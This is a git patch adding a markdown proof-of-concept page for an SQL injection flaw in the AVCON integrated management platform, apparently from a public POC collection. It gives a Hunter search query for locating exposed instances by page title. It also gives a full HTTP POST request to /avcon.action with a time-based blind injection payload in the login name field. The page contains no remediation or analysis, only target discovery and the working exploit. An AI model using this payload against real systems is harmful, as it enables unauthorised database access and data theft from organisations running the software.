From de2d0d47bf251a40ea95bbdc2e9bf68cf698d348 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sat, 23 Dec 2023 18:17:03 +0800 Subject: [PATCH] =?UTF-8?q?Create=20avcon=E7=BB=BC=E5=90=88=E7=AE=A1?= =?UTF-8?q?=E7=90=86=E5=B9=B3=E5=8F=B0SQL=E6=B3=A8=E5=85=A5=E6=BC=8F?= =?UTF-8?q?=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- avcon综合管理平台SQL注入漏洞.md | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 avcon综合管理平台SQL注入漏洞.md diff --git a/avcon综合管理平台SQL注入漏洞.md b/avcon综合管理平台SQL注入漏洞.md new file mode 100644 index 0000000..1ee413b --- /dev/null +++ b/avcon综合管理平台SQL注入漏洞.md @@ -0,0 +1,24 @@ +## avcon综合管理平台SQL注入漏洞 + + +## hunter +``` +web.title="AVCON-系统管理平台" +``` + +## poc +``` +POST /avcon.action HTTP/1.1 +Host: +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 77 + +name=0'XOR(if(now()=sysdate()%2Csleep(7)%2C0))XOR'Z&password=u]H[ww6KrA9F.x-F +``` +![a9c6cfee7dd8881ea4bf019d82903c04](https://github.com/wy876/POC/assets/139549762/349eafe6-c55e-449f-b6e4-bb01923c07ef)